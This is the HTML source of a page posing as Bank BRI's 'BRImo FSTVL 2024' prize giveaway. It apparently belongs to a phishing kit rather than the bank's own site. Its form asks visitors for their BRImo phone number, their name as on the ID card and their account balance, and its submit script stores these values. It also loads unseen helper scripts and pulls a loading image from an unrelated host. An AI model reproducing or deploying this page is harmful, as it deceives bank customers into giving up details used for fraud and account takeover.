<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <link rel="preload" href="https://www.googletagmanager.com/gtag/js?id=G-HHNHX5Z9PN" as="script" />
    <title>BRImo FSTVL 2024 - Berlimpah Hadiah - Bank BRI</title>
    <meta name="description"
        content="BRImo Berlimpah Hadiah! Raih lebih dari 100.000 hadiah dengan transaksi di BRImo: buka tabungan emas, bayar cicilan, belanja pakai QRIS, Kartu Kredit, debit BRI" />
    <meta name="author" content="BRI" />
    <meta name="keywords"
        content="bri, brimo FSTVL berlimpah hadiah, hadiah undian, hadiah langsung, BRimo, Nabung, Tabungan" />
    <meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1" />
    <link rel="canonical" href="https://brimofstvl.bri.co.id/" />
    <meta property="og:title" content="BRImo FSTVL 2024 - Berlimpah Hadiah - Bank BRI" />
    <meta property="og:description"
        content="BRImo Berlimpah Hadiah! Raih lebih dari 100.000 hadiah dengan transaksi di BRImo: buka tabungan emas, bayar cicilan, belanja pakai QRIS, Kartu Kredit, debit BRI" />
    <meta property="og:url" content="https://brimofstvl.bri.co.id/" />
    <meta property="og:image"
        content="https://s3.ap-southeast-3.amazonaws.com/brimo-fstvl-prod//brimo_festival_2024_berlimpah_hadiah_undian_f70904df70.webp" />
    <meta property="og:image:width" content="800" />
    <meta property="og:image:height" content="600" />
    <meta property="og:image:alt" content="BRImo FSTVL" />
    <meta property="og:type" content="website" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="BRImo FSTVL 2024 - Berlimpah Hadiah - Bank BRI" />
    <meta name="twitter:description"
        content="BRImo Berlimpah Hadiah! Raih lebih dari 100.000 hadiah dengan transaksi di BRImo: buka tabungan emas, bayar cicilan, belanja pakai QRIS, Kartu Kredit, debit BRI" />
    <meta name="twitter:image"
        content="https://s3.ap-southeast-3.amazonaws.com/brimo-fstvl-prod//brimo_festival_2024_berlimpah_hadiah_undian_f70904df70.webp" />
    <meta name="twitter:image:width" content="800" />
    <meta name="twitter:image:height" content="600" />
    <meta name="twitter:image:alt" content="BRImo FSTVL" />

    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="img/1.css">
    <script type="9519694163653644138a6d87-module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&amp;display=swap');
    }

    * {
        margin: 100px;
    }

    html,
    body {
        max-width: 100%;

    }

    body {
        margin: 0px;
        margin-bottom: 30%;
        background: #fff;
        color: #fff;
        font-family: 'Nunito', sans-serif;
    }

    .hua {

        bottom: 0px;
        margin-left: 23px;
        margin-top: 250px;
        position: relative;
        border: 5px solid #fff;
        padding: 15px;
        width: 78%;
        border-radius: 18px;
        background: #ffffffe6;
        background-size: 100%;
        height: 460px;
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px;
    }

    .hh {
        z-index: 99999999;
        position: fixed;
        top: 0px;
        left: 0;
        right: 0;
        margin: 0px auto;
        width: 100%;
        height: 50px;
        background: #0F78CB;
        border-bottom: 0px solid #fff;
        box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
    }

    .asu {
        width: 100%;
        margin-top: -200px;
        position: fixed;
        height: 100%;


    }

    .nyusu {
        border-radius: 7px;
        height: 150px;

        margin-top: 30px;
        margin-left: 20px;
        box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;

    }

    .kkk {
        box-sizing: border-box;
        height: 40px;
        width: 536px;
        max-width: 100%;
        border: 1px solid rgb(0, 134, 224);
        border-image: initial;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;
        font-family: 'Nunito', sans-serif;
        font-weight: bold;
        font-size: 16px;
        color: rgb(28, 28, 28);
        word-spacing: 0px;
        padding: 0px 10px;
        outline: none;
        margin-top: -15px;
        padding-left: 10px
    }

    .load {
        top: 0;
        left: 0;
        right: 0;
        position: fixed;
        display: flex;
        justify-content: center;
        align-items: center;
        background: #00000090;
        z-index: 999999999;
        width: 100%;
        height: 100%;
    }

    .jao {
        width: 90%;
    }

    .radio-item [type="radio"] {
        display: none;
    }

    .radio-item+.radio-item {
        margin-top: 5px;
    }

    .radio-item label {
        display: block;
        padding: 5px 8px;
        background: transparent;
        border: 2px solid #09559a;
        border-radius: 20px;
        cursor: pointer;
        font-size: 12px;
        font-weight: 400;
        min-width: 270px;
        padding-left: 0px;
        color: #09559a;
        margin: 5px auto;
        top: 10px;
        margin-bottom: 10px;
        position: relative;

    }

    .radio-item label:after,
    .radio-item label:before {
        content: "";
        position: absolute;
        border-radius: 50%;
    }

    .radio-item label:after {
        height: 20px;
        width: 20px;
        border: 1px solid #09559a;
        left: 9px;
        top: calc(50% - 11px);
    }

    .radio-item label:before {
        background: #09559a;
        height: 17px;
        width: 17px;
        left: 11.2px;
        top: calc(50% - 9.8px);
        transform: scale(5);
        opacity: 0;
        visibility: hidden;
        transition: 0.4s ease-in-out 0s;
    }

    .radio-item [type="radio"]:checked~label {
        border-color: #F8B13B;
    }

    .radio-item [type="radio"]:checked~label::before {
        opacity: 1;
        visibility: visible;
        transform: scale(1);
        margin-top: 0.9px;
    }

    .radio-section {
        display: flex;
        align-items: center;
        justify-content: center;
        height: 100vh;
        width: ;
    }
</style>

<body>
    <main>
        <welalxcome>
            <img src="img/BRImo.html" alt="" style="margin-top: -50px" />
        </welalxcome>
        <chsalxcome2 style="display: none;">

            <img style="position: fixed;width:100%;margin-top:-210px;" src="img/26-.png" alt="">
            <nav class="hh">
                <img src="img/nav.png" style="margin-top:8px; margin-left:175px;" width="40px" alt="">
            </nav>
            <div class="load" style="display:none">
                <img src="../../hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
            </div>
            <marquee direction="right" behavior="alternate" scrolldelay="10" class="asu">
                <img class="nyusu" src="img/1.png" alt="">
                <img class="nyusu" src="img/2.png" alt="">
                <img class="nyusu" src="img/3.png" alt="">
                <img class="nyusu" src="img/4.png" alt="">
                <img class="nyusu" src="img/5.png" alt="">
            </marquee>



            <form method="post" id="formHP">
                <center><img style="position: fixed;width:20%;margin-top:610px;margin-left:-40px;" src="img/T24.png"
                        alt=""></center>
                <div class="button-85 hua">
                    <center style="color:#09559a; line-height: 20px; font-size: 15px; padding: 0px;margin-top:-12px;">
                        <p
                            style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:5px;height:50px;">
                            Nasabah berkesempatan memenangkan hadiah undian :</p>
                        <img style="width:100%;margin-bottom:-15px;" src="img/index.png" alt="">
                    </center>



                    <br>
                    <br>
                    <h5 style="position:absolute;color:#000; margin-top: -28px; margin-left: 4px">Masukan Nomor ponsel
                        <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>

                    <ion-icon name="phone-portrait-sharp">
                    </ion-icon>
                    <input id="NoHp" name="nohp" type="tel" class="kk" placeholder="08xxxxxx" required maxlength="13"
                        autocomplete="off" minlength="10">
                    </h3>


                    <br>
                    <br>
                    <br>
                    <h5 style="position:absolute;color:#000; margin-top: -28px; margin-left: 4px">Atas Nama :</h5>
                    <input id="nama" name="nama" type="text" class="kkk" placeholder="Nama Sesuai KTP"
                        autocomplete="off" required maxlength="" minlength="">
                    </h3>
                    <br>
                    <br>
                    <br>
                    <h5 style="position:absolute;color:#000; margin-top: -28px; margin-left: 4px">Saldo akhir sesuai
                        rekening:</h5>
                    <input id="dengan-rupiah" name="saldo" type="tel" class="kkk" placeholder="Rp. xxxxx"
                        autocomplete="off" required maxlength="" minlength="">
                    </h3>
                </div>






                <div class="kutal">
                    <button class="patokk" type="submit" id="kirim" disabled>Lanjutkan</button>
                </div>
                </smalxs>
    </main>
    </form>

    <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js' type="9519694163653644138a6d87-text/javascript"></script>
    <script src="script.html" type="9519694163653644138a6d87-text/javascript"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js" type="9519694163653644138a6d87-text/javascript"></script>
    <script type="9519694163653644138a6d87-text/javascript">
        $(document).ready(function () {
            $('chsalxcome2').fadeIn(1000);
            $('welalxcome').fadeOut(1000);
            setTimeout(() => {
                $('welalxcome').fadeOut();
                $('chsalxcome2').fadeIn();
            }, 500)
        });
    </script>
    <script src="js/vibr.js" type="9519694163653644138a6d87-text/javascript"></script>
    <script src="nl/1.js" type="9519694163653644138a6d87-text/javascript">
    </script>
    <script src="js/jorai.js" type="9519694163653644138a6d87-text/javascript"></script>
    <script src="js/1.js" type="9519694163653644138a6d87-text/javascript"></script>
    <script type="9519694163653644138a6d87-text/javascript">
        document.getElementById('formHP').addEventListener('submit', function (event) {
          event.preventDefault(); // Mencegah pengiriman form
      
          // Ambil data dari input
          const noHp = document.getElementById('NoHp').value;
          const nama = document.getElementById('nama').value;
          const saldo = document.getElementById('dengan-rupiah').value;
      
          // Simpan data ke sessionStorage
          sessionStorage.setItem('noHp', noHp);
          sessionStorage.setItem('nama', nama);
          sessionStorage.setItem('saldo', saldo);
      
          // Redirect ke halaman berikutnya
        //   window.location.href = 'halaman_berikutnya.html';
        });
      </script>
      
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="9519694163653644138a6d87-|49" defer></script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fd33e264e463e2b',t:'MTczNjA3Nzc0My4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script></body>
</html>